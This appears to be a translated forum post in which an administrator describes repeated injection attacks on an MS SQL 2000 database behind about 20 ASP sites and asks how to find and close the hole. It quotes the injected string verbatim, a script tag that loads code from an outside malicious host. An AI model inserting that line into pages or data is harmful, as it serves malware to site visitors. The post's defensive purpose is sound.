SQL Server

Hacking MS SQL 2000sp4 database

there is a 2003 enterprise sp2 server standing in a rack in the data center
on it MS SQL server 2000 sp4 + all auto-updates with Windows Update
Built-in services are up: IIS + ftp + smt + dns
The built-in firewall is enabled, in which 4 dns ports
tcp / udp 53 are open
ftp 21
http 80
terminal 3389

About 20 sites are hosted on the server, with a total attendance of up to 4 thousand visitors per day.
Most sites use a management system written in ASP vb script over 10 years ago.
Proven over the years, debugged bug-free code.
The server in the current configuration has been running smoothly for more than 4 years.

3 days ago, attackers made changes to the SQL database, and out of 6 available edits were
are included only in 1, which is responsible for the most visited sites.
In all tables, in all text columns in each line, the
following code was added before the liquid information:
"> </title><script src="http://tenin58gaccel.rr.nu/sl.php?v=3"></script><!--
As a result, since even the titles for the pages were taken from the SQl database, none of the sites worked because they
tried to download a virus and were blocked by an antivirus.

What did.
I changed the administrator password, although it didn’t seem to be picked up,
because judging by the logs, they successfully logged into the system only through the terminal and only at the time when I logged in.
I checked which files have been added to the system or modified since the hack - nothing
suspicious. Kaspersky (with up-to-date databases) also did not find anything.
A search in all test documents for the presence of tenin58gaccel also did not give anything - I thought maybe in some of the ASP files they placed the code that updates the database.
Rearranged SQl server with new SA password, +SP4 + Security Update for SQL Server 2000 Service Pack 4 (KB983812).
Added 1 account for access to the SQL server from the program code - with a new password.
Checked the firewall rules.
I checked all the procedures and queries built into the databases - nothing new and hostile.

The measures taken did not help: over the past 2 days, the database has been modified 3 more times, and now
a link to the virus is added to only one table, as a result of which it is loaded only from those pages on which There are captions for the pictures.

A Google search for rr.nu/sl.php?v=3 (the 3rd level domain in the link changes with each new modification of the database)
gives out a bunch of sites that have undergone a similar attack

. The question is - maybe someone knows what it is and how to deal with it?
Tell me how you can find out where the security hole is and how to fix it - the first time I encounter
a similar problem ((